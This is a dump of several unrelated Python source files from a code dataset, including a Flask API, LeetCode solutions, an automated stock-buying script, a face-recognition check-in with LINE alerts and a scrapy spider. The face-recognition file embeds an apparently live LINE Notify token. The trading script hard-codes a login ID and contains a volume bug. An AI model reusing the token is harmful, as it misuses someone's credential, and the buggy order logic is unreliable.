companies_collection.find({})\n if companies.count() == 0:\n with open(f'{resource_path}/companies.json') as f:\n companies_data = json.load(f)\n companies_collection.insert_many(companies_data) \n\n people_collection = db['people']\n if people_collection.count() == 0:\n with open(f'{resource_path}/people.json') as f:\n people_data = json.load(f)\n for p in people_data:\n favouriteFood = p['favouriteFood']\n p['favouriteVegetables'] = list(filter(lambda x: x in VEGETABLE_LIST, favouriteFood))\n p['favouriteFruits'] = list(filter(lambda x: x in FRUIT_LIST, favouriteFood))\n del p['favouriteFood']\n people_collection.insert_one(p)\n\n client.close()\n\n\n@app.route('/')\ndef hello():\n return \"Welcome to Paranuara!\"\n\n@app.route('/companies//employees', methods= ['GET'])\ndef get_company_employees(company_id):\n result = []\n\n try:\n client, db = get_db()\n\n companies_collection = db['companies']\n\n company = companies_collection.find_one({'index': company_id})\n if not company:\n return 'Company not found', 404\n\n people_collection = db['people']\n\n employees = people_collection.find({'company_id': company_id})\n \n for e in employees:\n result.append(e)\n\n client.close()\n except Exception as e:\n print('Unexpected error:', str(e))\n return 'Internal Server Error', 500\n\n return jsonify({'employees': result}), 200\n\n\n@app.route('/people/filtered_common_friends', methods= ['GET'])\ndef get_filtered_common_friends():\n try:\n first_id = int(request.args.get('first_id'))\n second_id = int(request.args.get('second_id'))\n except ValueError:\n return 'Invalid person id', 400\n\n result = []\n try:\n client, db = get_db()\n\n people_collection = db['people']\n\n persons = people_collection.find({'$or': [\n {'index': first_id },\n {'index': second_id }\n ]})\n\n if persons.count() < 2:\n return 'Person not found', 404\n\n if persons.count() > 2:\n return 'Corrupted data', 500 \n\n common_friends = set() \n\n first_person = {}\n second_person = {}\n for p in persons:\n if p['index'] == first_id: \n first_person = {\n 'name': p['name'],\n 'age': p['age'],\n 'address': p['address'],\n 'phone': p['phone']\n }\n else:\n second_person = {\n 'name': p['name'],\n 'age': p['age'],\n 'address': p['address'],\n 'phone': p['phone']\n }\n\n friends = p['friends']\n for f in friends:\n common_friends.add(f['index'])\n\n filtered_common_friends = people_collection.find({'$and': [\n {'index': {'$in': list(common_friends)}},\n {'eyeColor': 'brown'},\n {'has_died': False}\n ]}) \n\n for f in filtered_common_friends:\n result.append(f) \n\n client.close()\n except Exception as e:\n print('Unexpected error:', str(e))\n return 'Internal Server Error', 500\n\n return jsonify({'first_person': first_person, 'second_person': second_person,'filtered_common_friends': result})\n\n@app.route('/people//favouriteFood', methods= ['GET'])\ndef get_favourite_food(person_id):\n\n result = {}\n try:\n client, db = get_db()\n\n people_collection = db['people']\n\n person = people_collection.find_one({'index': person_id})\n\n if not person:\n return 'Person not found', 404\n \n client.close()\n except Exception as e:\n print('Unexpected error:', str(e))\n return 'Internal Server Error', 500\n\n return jsonify({\n 'username': person['name'],\n 'age': person['age'],\n 'fruits': person['favouriteFruits'],\n 'vegetables': person['favouriteVegetables']\n })\n\nif __name__ == '__main__':\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"118107177","text":"# Leetcode 86. Partition List\n\n\"\"\"\nGiven a linked list and a value x, partition it such that all nodes less than\nx come before nodes greater than or equal to x.\n\nYou should preserve the original relative order of the nodes in each of the\ntwo partitions.\n\nExample:\n\nInput: head = 1->4->3->2->5->2, x = 3\nOutput: 1->2->2->4->3->5\n\"\"\"\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n small = smallHead = ListNode(0)\n big = bigHead = ListNode(0)\n curr = head\n while curr:\n next = curr.next\n curr.next = None\n if curr.val < x:\n small.next = curr\n small = small.next\n else:\n big.next = curr\n big = big.next\n curr = next\n small.next = bigHead.next\n return smallHead.next\n\n\nclass Solution:\n def partition(self, head, x):\n \"\"\"\n :type head: ListNode\n :type x: int\n :rtype: ListNode\n \"\"\"\n dummy = ListNode(0)\n dummy.next = head\n left, prev, curr = dummy, dummy, head\n while curr:\n if left == prev:\n if curr.val < x: left = left.next\n prev, curr = curr, curr.next\n else:\n if curr.val >= x: prev, curr = curr, curr.next\n else:\n prev.next = curr.next\n curr.next = left.next\n left.next = curr\n left = left.next\n curr = prev.next\n return dummy.next\n\n\n \n","sub_path":"Leetcode in Python/Linked List/Leetcode 86. Partition List.py","file_name":"Leetcode 86. Partition List.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446998698","text":"# -*- coding: cp936 -*-\n\n#1) 准备股票池,去除停牌,去除ST\n#2) 登陆交易妥当,得到总资金\n#3)获得做收价\n#4) 等待时间,9.25开始,调用wsq获取股票池股票价格\n#5) 跌幅大于8%的,计算购买量,计算购买价,统一使用下单函数下单。\n#6)结束\n#7)可以通过tquery查询\n\n\n\n\nfrom WindPy import *\nimport time as st;\nfrom datetime import *;\n\ndef getStocks():\n w.start();\n data=w.wset('SectorConstituent','field=wind_code;sector=全部A股(非ST)')\n \n return (data.ErrorCode,data.Data[0]);\n\ndef logonTo():\n data=w.start(60);\n if(data.ErrorCode!=0):\n return (-1,None);\n data=w.tlogon('0000','0','w081263801','0','SHSZ');\n if(data.ErrorCode!=0):\n return (-2,None);\n return(0,data.Data[0][0]);\n\ndef ifelse(c,v1,v2):\n if(c):\n return (v1);\n else:\n return (v2);\ndef buyOnOpen(codes,amount=10000000,chggate=0.08,addprice=0.01):\n\n (err,logonid)=logonTo()\n if(err):\n print(\"logon error:\",err);\n return(err);\n \n data=w.wsq(codes,'rt_pre_close');\n if(data.ErrorCode!=0):\n return (-1);\n preprice = data.Data[0];\n gateprice = [l*(1-chggate) for l in preprice];\n \n nextquerytime=datetime.now()+timedelta(0,120)\n while(1):\n now = datetime.now();\n endtime = datetime(now.year,now.month,now.day,9,31,00);\n begintime=datetime(now.year,now.month,now.day,9,25,00);\n\n if(now>endtime):\n print(\"now >9:30:00\")\n return (1)\n\n if(now11):\n if(now>nextquerytime):\n data = w.tquery(1);\n if(data.ErrorCode!=0):\n print(\"tquery(1) error!\");\n return(-1);\n nextquerytime=datetime.now()+timedelta(0,120);\n data=w.wsq(codes,'rt_pre_close');\n if(data.ErrorCode!=0):\n return (-1);\n preprice = data.Data[0];\n gateprice = [l*(1-chggate) for l in preprice];\n\n delta=10;\n print(\"wait to open,sleep ten seconds!\");\n st.sleep(delta);\n continue;\n\n data = w.wsq(codes,'rt_last');\n if(data.ErrorCode!=0):\n continue;\n\n index =list();\n for i in range(len(data.Data[0])):\n if( (data.Data[0][i]0.0001)):\n index.append(i);\n if(len(index)<1):\n continue;\n buycodes = [codes[i] for i in index];\n buyprice = [data.Data[0][i]+addprice for i in index];\n everyamount = amount/len(buyprice);\n buyvol = [int(everyamount/v/100)*100 for v in buyprice]\n buyvol = [v>500000 for v in buyvol]\n logonids = [logonid for v in range(len(buycodes))];\n data=w.torder(buycodes,'buy',buyprice,buyvol,logonid=logonids);\n print(data)\n return (0)\n \n\n(err,codes)=getStocks();\nif(err==0):\n buyOnOpen(codes);\nelse:\n print(\"getStocks error:\",err);\n","sub_path":"Python/buyOnOpen.py","file_name":"buyOnOpen.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"255172859","text":"from __future__ import print_function\nimport os.path as path\nimport sys\nimport numpy as np\nfrom scipy.io.netcdf import netcdf_file as nopen\n\n\n__version__ = '0.3'\n\n\n_base_dir = path.join(path.dirname(__file__), 'data')\nhas_const = path.exists(path.join(_base_dir, 't_constituents_const.nc'))\nhas_sat = path.exists(path.join(_base_dir, 't_constituents_sat.nc'))\nhas_shallow = path.exists(path.join(_base_dir, 't_constituents_shallow.nc'))\n\nif (has_const and has_sat and has_shallow):\n _const = {}\n _sat = {}\n _shallow = {}\n\n ncid = nopen(path.join(_base_dir,\n 't_constituents_const.nc'), 'r', mmap=False)\n for key in ncid.variables.keys():\n _const[key] = ncid.variables[key].data\n ncid.close()\n\n ncid = nopen(path.join(_base_dir,\n 't_constituents_sat.nc'), 'r', mmap=False)\n for key in ncid.variables.keys():\n _sat[key] = ncid.variables[key].data\n ncid.close()\n\n ncid = nopen(path.join(_base_dir,\n 't_constituents_shallow.nc'), 'r', mmap=False)\n for key in ncid.variables.keys():\n _shallow[key] = ncid.variables[key].data\n ncid.close()\n\n # Correct issues with name strings\n _const['name'] = np.array([b''.join([s for s in arr])\n for arr in _const['name']])\n\n _const['kmpr'] = np.array([b''.join([s for s in arr])\n for arr in _const['kmpr']])\n\nelse:\n print('You do not have t_constituents_*.npy ' +\n 'check that package installation is correct.')\n _const = {}\n _sat = {}\n _shallow = {}\n","sub_path":"ttide/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417964433","text":"import time\r\nimport cv2 as cv\r\nimport smtplib as sm\r\nimport os\r\nfrom practicum import find_mcu_boards, McuBoard, PeriBoard\r\nfrom requests import get, post\r\nfrom line_notify import LineNotify\r\n\r\n\r\ndef notifymessage(message):\r\n payload = {\"message\": message}\r\n sendnotify(payload)\r\n\r\ndef notifypic(message, url):\r\n payload = {\"message\": message,\r\n \"imageFile\": open(url,'rb')}\r\n sendnotify(payload)\r\n\r\ndef sendnotify(payload, file = None):\r\n url = 'https://notify-api.line.me/api/notify'\r\n token = '2dlsMzR3c0HjNMYtZVKyt1Wou1dX02RLzs6sJRyW6iD'\r\n headers = {\"content-type\": \"application/x-www-form-urlencoded\",\r\n \"Authorization\": f\"Bearer {token}\"}\r\n #payload = {\"message\": message}\r\n r = post(url, headers=headers, data=payload, files=file)\r\n print(r.text)\r\n\r\ndef sendpic(txt, path, token):\r\n notify = LineNotify(token)\r\n notify.send(txt + ' checked in', path) # send picture\r\n\r\n#notifymessage(\"bung\")\r\n\r\nhaar_cascade = cv.CascadeClassifier('haarcascade_frontalface_default.xml')\r\npeople = ['You_know_who', 'Taro', 'prayuth', 'M']\r\n#features = np.load('features.npy', allow_pickle=True)\r\n#labels = np.load('labels.npy')\r\nimg = 0\r\npath = '/home/pi/practicum/project/usb-example/python/pic/'\r\nface_recognizer = cv.face.LBPHFaceRecognizer_create()\r\nface_recognizer.read('face_trained.yml')\r\ncapture = cv.VideoCapture(0)\r\nswitch = 0\r\nlst = [0] * len(people)\r\nunknown = 0\r\nfinish = 0\r\nnump = 1\r\ntoken = '2dlsMzR3c0HjNMYtZVKyt1Wou1dX02RLzs6sJRyW6iD'\r\n\r\ndevices = find_mcu_boards()\r\nmcu = McuBoard(devices[0])\r\nperi = PeriBoard(mcu)\r\nperi.get_switch()\r\nperi.set_led(0,0)\r\nperi.set_led(1,0)\r\nperi.set_led(2,0)\r\n\r\nwhile True:\r\n #capture = cv.VideoCapture(\"192.168.2.46:8080\")\r\n blank, img = capture.read()\r\n img+=1\r\n img = cv.resize(img, (300,200))\r\n gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\r\n #cv.imshow('Person', gray)\r\n\r\n # Detect the face in the image\r\n faces_rect = haar_cascade.detectMultiScale(gray, 1.1, 4)\r\n \r\n for (x,y,w,h) in faces_rect:\r\n faces_roi = gray[y:y+h,x:x+h]\r\n label, confidence = face_recognizer.predict(faces_roi)\r\n print(f'label = {people[label]} with a confidence of {confidence} lst[label]={lst[label]}')\r\n print(f'unknown={unknown}')\r\n\r\n if (unknown >=50):\r\n #red\r\n if(finish == 0):\r\n peri.set_led(0,1)\r\n peri.set_led(1,0)\r\n peri.set_led(2,0)\r\n cv.imwrite(os.path.join(path,'photo' + str(nump) + '.jpeg'),img)\r\n #notifymessage(\"Unknown\")\r\n #notifypic(\"Unknown\",path+'photo' + str(nump) + '.jpeg')\r\n sendpic(\"Unknown\", path+\"photo1.jpeg\", token) \r\n nump += 1\r\n lst = [0] * len(people)\r\n unknown = 0\r\n finish = 1\r\n if(lst[label]>=50):\r\n if(finish == 0): \r\n peri.set_led(0,0)\r\n peri.set_led(1,0)\r\n peri.set_led(2,1)\r\n cv.imwrite(os.path.join(path,'photo' + str(nump) + '.jpeg'),img)\r\n #notifymessage(people[label]+' checked in')\r\n #notifypic(people[label] + ' checked in', path+'photo' + str(nump) + '.jpeg')\r\n sendpic(people[label], path+\"photo1.jpeg\", token)\r\n nump += 1\r\n #f=open(\"int.txt\",\"w\")\r\n #integer=1\r\n #f.write(str(integer))\r\n #f.truncate()\r\n unknown = 0\r\n lst = [0] * len(people)\r\n finish = 1\r\n if(lst[label]>=0 or unknown >= 0):\r\n #yellow\r\n if(finish == 0):\r\n peri.set_led(0,0)\r\n peri.set_led(1,1)\r\n peri.set_led(2,0)\r\n if (confidence >= 60 and confidence <= 100):\r\n lst[label] += 1\r\n cv.putText(img, str(people[label]), (x, y - 4), cv.FONT_HERSHEY_COMPLEX, 0.8, (0, 255, 0), thickness=2)\r\n cv.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), thickness=2)\r\n cv.imshow('Detected Face', img)\r\n elif(confidence < 60 or confidence > 100):\r\n unknown+=1\r\n cv.putText(img, \"Unknown\", (x,y-4), cv.FONT_HERSHEY_COMPLEX, 0.8, (0,0,255), thickness=2)\r\n cv.rectangle(img, (x,y), (x+w,y+h), (000,0,255), thickness=2)\r\n cv.imshow('Detected Face', img)\r\n \r\n if(cv.waitKey(1) & 0xFF == ord('d')):\r\n peri.set_led(0,0)\r\n peri.set_led(1,0)\r\n peri.set_led(2,0)\r\n break\r\n","sub_path":"sourcecode/usb-example/python/face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"81261763","text":"import pygame\n\n# Setup\npygame.init()\n\n# Set the width and height of the screen [width,height]\ndisplayinfo = pygame.display.Info()\nheight = displayinfo.current_h - 200\nhh = height/2\nscreen = pygame.display.set_mode([height, height])\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)","sub_path":"the_new_rpg/src/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"120091647","text":"\n#DOES NOT WORK\n#Attempts to fill out form and parse, results\n\n\n\n\nimport scrapy\n\n\nclass ContractFormSpider(scrapy.Spider):\n name = \"contract_form\"\n\n def start_requests(self):\n url = 'https://www.fbo.gov/index?s=opportunity&tab=search&mode=list'\n\n\n\n yield scrapy.Request(url=url, callback=self.parse)\n\n\n def parse(self, response):\n\n # store html of URL in html file to be analyzed\n # filename = 'fbo-form.html'\n # with open(filename, 'wb') as f:\n # f.write(response.body)\n # self.log('Saved file %s' % filename)\n yield scrapy.FormRequest.from_response(\n response,\n formdata={'dnf_class_values[procurement_notice][naics_code][]' : '0001',\n 'dnf_class_values[procurement_notice][searchtype]' : 'active',\n 'dnf_class_values[procurement_notice][all_agencies]' : 'all',\n 'dnf_class_values[procurement_notice][recovery_act]' : '0'},\n formname='vendor_procurement_notice_search',\n callback=self.after_form,\n method=\"POST\",\n )\n\n def after_form(self, response):\n url = 'https://www.fbo.gov/?s=opportunity&mode=list&tab=searchresults'\n\n\n yield scrapy.Request(url=url, callback=self.after_form_parse)\n\n\n # filename = 'response.html'\n # with open(filename, 'wb') as f:\n # f.write(response.headers)\n # self.log('Saved file %s' % filename)\n # return response\n\n def after_form_parse(self, response):\n\n filename = 'response.html'\n with open(filename, 'wb') as f:\n f.write(response.body)\n self.log('Saved file %s' % filename)\n","sub_path":"examples/contract_form_spider.py","file_name":"contract_form_spider.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"137248531","text":"#!/usr/bin/env Python\n# -*- coding: utf-8 -*-\n\nimport datetime\n\n# d1 = datetime.date(input('Please input the Startdate\"as: 2017,8,10\" :'))\n# d2 = datetime.date(input('Please input the Enddate\"as: 2017,8,10\" :'))\n#\n# # d3 = datetime.date(d1)\n# # d4 = datetime.date(d2)\n#\n# print(d1.days)\n# print(d2.days)\n#\n# print((d2-d1).days)\n#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\n# import datetime\n# i = datetime.datetime.now()\n# print(\"当前的日期和时间是 %s\" % i)\n# print(\"ISO格式的日期和时间是 %s\" % i.isoformat())\n# print(\"当前的年份是 %s\" % i.year)\n# print(\"当前的月份是 %s\" % i.month)\n# print(\"当前的日期是 %s\" % i.day)\n# print(\"dd/mm/yyyy 格式是 %s/%s/%s\" % (i.day, i.month, i.year))\n# print(\"当前小时是 %s\" % i.hour)\n# print(\"当前分钟是 %s\" % i.minute)\n# print(\"当前秒是 %s\" % i.second)\n\n\n\n#import time\n\n# t = time.time()\n# print(t)\n#\n# # import time\n#\n# localtime = time.localtime(time.time())\n# print(\"本地时间为 :\", localtime)\n# print(\"本地时间为 :\", localtime.tm_year)\n\n# dt = \"2016-05-05 20:28:54\"\n\n\n\n\n# 输入两个时间,输出相隔多少天\nimport time\n#输入\ndt_s = input('输入开始时间,\"e:20170703\": ')\ndt_e = input('输入结束时间,\"e:20170703\": ')\n#转换成时间数组\ntimeArray_s = time.strptime(dt_s, \"%Y%m%d\")\ntimeArray_e = time.strptime(dt_e, \"%Y%m%d\")\n# print(timeArray_e,timeArray_s)\n#转换成时间戳\ntimestamp_s = time.mktime(timeArray_s)\ntimestamp_e = time.mktime(timeArray_e)\n# print(timestamp_e)\n# print(timestamp_s)\n#转换成天数\nsjc = (timestamp_e - timestamp_s)\ndt = (timestamp_e - timestamp_s)/(60 * 60 * 24)\nnj = (5*dt)/365\nprint(\"两个日期之间有 %d 天.\" % dt)\nprint(\"年假有 %.2f 天.\" % nj)\n#print(sjc)","sub_path":"py_coding/3.0+/Date/date_to_date.py","file_name":"date_to_date.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"177331422","text":"import csv\nimport multiprocessing as mp\nimport os\n\nfrom common import timeit, load_configurations, create_demand_matrix_for_configuration\nfrom network import OriginalDanNetwork, EgoBalanceDanNetwork, BfsDanNetwork, HuffmanDanNetwork, RandomDanNetwork\n\nFIG_NUM = 0\n\n\n@timeit\ndef main(show=False):\n configurations = load_configurations(\"../config.json\")\n active_config = configurations[1]\n\n res = []\n\n vertex_nums = [25, 50, 75, 100, 125, 150, 175, 200]\n delta_nums = [10, 16, 24, 48]# , \"1d\", \"2d\", \"4d\", \"6d\", \"8d\", \"10d\", \"12d\"]\n constants = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n if not os.path.exists(\"unified_res\"):\n os.mkdir(\"unified_res\")\n res_file_original = os.path.join('unified_res', 'e_barabasi_unified_1.csv')\n\n # if not os.path.exists(\"egobalance_res\"):\n # os.mkdir(\"egobalance_res\")\n # res_file_egobalance = os.path.join('egobalance_res', 'results_s_egobalance.csv')\n #\n # if not os.path.exists(\"huffman_res\"):\n # os.mkdir(\"huffman_res\")\n # res_file_huffman = os.path.join('huffman_res', 'results_s_huffman.csv')\n #\n # if not os.path.exists(\"bfs_res\"):\n # os.mkdir(\"bfs_res\")\n # res_file_bfs = os.path.join('bfs_res', 'results_s_bfs.csv')\n #\n # if not os.path.exists(\"random_res\"):\n # os.mkdir(\"random_res\")\n # res_file_random = os.path.join('random_res', 'results_s_random.csv')\n\n fields = ['graph', 'vertex_num', 'constant', 'congestion', 'real_congestion', 'avg_route_len', 'delta',\n 'max_delta', 'dan', 'most_congested_route', 'max_route_len', 'avg_tree_weight', 'most_tree_ratio',\n 'tree_count', 'type', 'start_entropy']\n\n with open(res_file_original, 'w') as csvFile:\n writer = csv.DictWriter(csvFile, fieldnames=fields)\n writer.writeheader()\n csvFile.close()\n\n # with open(res_file_huffman, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n #\n # with open(res_file_bfs, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n #\n # with open(res_file_egobalance, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n #\n # with open(res_file_random, 'w') as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writeheader()\n # csvFile.close()\n\n for vertex_num in vertex_nums:\n for delta_num in delta_nums:\n configs = []\n for constant in constants:\n for i in range(20):\n active_cfg = active_config.copy()\n active_cfg['vertex_num'] = vertex_num\n active_cfg['constant'] = constant\n active_cfg['dan'] = delta_num\n configs.append(active_cfg)\n\n with mp.Pool() as p:\n res1 = p.map(run_dan_original, configs)\n res2 = p.map(run_dan_egobalance, configs)\n res3 = p.map(run_dan_huffman, configs)\n res4 = p.map(run_dan_bfs, configs)\n res5 = p.map(run_dan_random, configs)\n\n\n with open(res_file_original, \"a+\") as csvFile:\n writer = csv.DictWriter(csvFile, fieldnames=fields)\n writer.writerows(res1)\n writer.writerows(res2)\n writer.writerows(res3)\n writer.writerows(res4)\n writer.writerows(res5)\n csvFile.close()\n\n # with open(res_file_egobalance, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writerows(res2)\n # csvFile.close()\n #\n # with open(res_file_huffman, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writerows(res3)\n # csvFile.close()\n #\n # with open(res_file_bfs, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writerows(res4)\n # csvFile.close()\n #\n # with open(res_file_random, \"a+\") as csvFile:\n # writer = csv.DictWriter(csvFile, fieldnames=fields)\n # writer.writerows(res5)\n # csvFile.close()\n\n # if show:\n # render_everyting(network)\n # plt.show()\n\n\ndef run_dan_original(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = OriginalDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"original\"}\n\n\ndef run_dan_egobalance(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = EgoBalanceDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"egobalance\"}\n\n\ndef run_dan_bfs(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = BfsDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"bfs\"}\n\n\ndef run_dan_huffman(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = HuffmanDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"huffman\"}\n\n\ndef run_dan_random(active_config):\n demand_matrix = create_demand_matrix_for_configuration(active_config)\n network = RandomDanNetwork(demand_matrix)\n network.create_dan(active_config['dan'])\n summary = network.get_summary()\n print(active_config)\n print(summary)\n return {**summary, **active_config, \"type\": \"random\"}\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/barabasi_benchmark/benchmark-all-dan.py","file_name":"benchmark-all-dan.py","file_ext":"py","file_size_in_byte":6371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"351826947","text":"import sys\nimport os\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))\nfrom commonfunc import get_timestamp_by_time\nimport constvars\n\ndef makeexpecteddata(hour=-1):\n\n with open(os.path.abspath(os.path.dirname(__file__)) + '/../testdata/FileOnDemandCleaned.txt', 'r') as resultfile:\n orglines = resultfile.readlines()\n\n time_format = constvars.recorddate + '000001'\n timestamp = long(get_timestamp_by_time(time_format)[:-3])\n\n with open(os.path.abspath(os.path.dirname(__file__)) + \"/../inputdata/%s.txt\"%__name__.split('.')[-1],\"w\") as expectedfile:\n resultlist = {}\n for line in orglines:\n _,peerid,timesp,_,_,_,_,_,type = line.split(',')\n type=type.replace('\\n','')\n for i in range(24):\n if (timestamp + 3600*(i+1)) > long(timesp[:-3]) >= (timestamp + 3600*i):\n if i not in resultlist:\n resultlist[i]={}\n if peerid not in resultlist[i]:\n resultlist[i][peerid] = 1\n else:\n resultlist[i][peerid] = resultlist[i][peerid] + 1\n break\n\n for hour, values in resultlist.items():\n for peeid, count in values.items():\n expectedfile.write('%s,%s,%d\\n' % (peeid,hour,count))\n\n return os.path.abspath(os.path.dirname(__file__)) + \"/../inputdata/%s.txt\"%__name__.split('.')[-1]\n\n\n","sub_path":"lib/platform/dataprocess/logicmodule/PeerHourPlayCount.py","file_name":"PeerHourPlayCount.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269965100","text":"from setuptools import setup, find_packages\nimport os\nimport os.path as op\nimport uuid\n\nver_file = os.path.join('popylar', 'version.py')\nwith open(ver_file) as f:\n exec(f.read())\n\npopylar_path = op.join(op.expanduser('~'), '.popylar')\nuid = uuid.uuid1()\n\nfhandle = open(popylar_path, 'a')\nfhandle.write(uid.hex)\nfhandle.close()\n\nPACKAGES = find_packages()\n\nopts = dict(name=NAME,\n maintainer=MAINTAINER,\n maintainer_email=MAINTAINER_EMAIL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n url=URL,\n download_url=DOWNLOAD_URL,\n license=LICENSE,\n classifiers=CLASSIFIERS,\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n platforms=PLATFORMS,\n version=VERSION,\n requires=REQUIRES)\n\n\nif __name__ == '__main__':\n setup(**opts)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"30791674","text":"##############################################################################\n#\n# Copyright (c) 2011 Zope Foundation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"Mongo Persistent Data Manager\"\"\"\nfrom __future__ import absolute_import\nimport UserDict\nimport persistent\nimport pymongo\nimport pymongo.dbref\nimport transaction\nimport zope.interface\n\nfrom mongopersist import interfaces, serialize\n\ndef create_conflict_error(obj, new_doc):\n return interfaces.ConflictError(\n None, obj,\n (new_doc.get('_py_serial', 0), serialize.u64(obj._p_serial)))\n\ndef processSpec(collection, spec):\n try:\n adapter = interfaces.IMongoSpecProcessor(None)\n except TypeError:\n # by default nothing is registered, handle that case\n return spec\n\n return adapter.process(collection, spec)\n\nclass Root(UserDict.DictMixin):\n\n database='mongopersist'\n collection = 'persistence_root'\n\n def __init__(self, jar, database=None, collection=None):\n self._jar = jar\n if database is not None:\n self.database = database\n if collection is not None:\n self.collection = collection\n db = self._jar._conn[self.database]\n self._collection_inst = db[self.collection]\n\n def __getitem__(self, key):\n doc = self._collection_inst.find_one(\n processSpec(self._collection_inst, {'name': key}))\n if doc is None:\n raise KeyError(key)\n return self._jar.load(doc['ref'])\n\n def __setitem__(self, key, value):\n dbref = self._jar.dump(value)\n if self.get(key) is not None:\n del self[key]\n doc = {'ref': dbref, 'name': key}\n self._collection_inst.insert(doc)\n\n def __delitem__(self, key):\n doc = self._collection_inst.find_one(\n processSpec(self._collection_inst, {'name': key}))\n coll = self._jar._conn[doc['ref'].database][doc['ref'].collection]\n coll.remove(doc['ref'].id)\n self._collection_inst.remove({'name': key})\n\n def keys(self):\n return [doc['name'] for doc in self._collection_inst.find()]\n\n\nclass MongoDataManager(object):\n zope.interface.implements(interfaces.IMongoDataManager)\n\n detect_conflicts = False\n default_database = 'mongopersist'\n name_map_collection = 'persistence_name_map'\n conflict_error_factory = staticmethod(create_conflict_error)\n\n def __init__(self, conn, detect_conflicts=None, default_database=None,\n root_database=None, root_collection=None,\n name_map_collection=None, conflict_error_factory=None):\n self._conn = conn\n self._reader = serialize.ObjectReader(self)\n self._writer = serialize.ObjectWriter(self)\n self._registered_objects = []\n self._loaded_objects = []\n self._needs_to_join = True\n self._object_cache = {}\n self.annotations = {}\n if detect_conflicts is not None:\n self.detect_conflicts = detect_conflicts\n if default_database is not None:\n self.default_database = default_database\n if name_map_collection is not None:\n self.name_map_collection = name_map_collection\n if conflict_error_factory is not None:\n self.conflict_error_factory = conflict_error_factory\n self.transaction_manager = transaction.manager\n self.root = Root(self, root_database, root_collection)\n\n def dump(self, obj):\n return self._writer.store(obj)\n\n def load(self, dbref):\n return self._reader.get_ghost(dbref)\n\n def reset(self):\n root = self.root\n self.__init__(self._conn)\n self.root = root\n\n def setstate(self, obj):\n # When reading a state from Mongo, we also need to join the\n # transaction, because we keep an active object cache that gets stale\n # after the transaction is complete and must be cleaned.\n if self._needs_to_join:\n 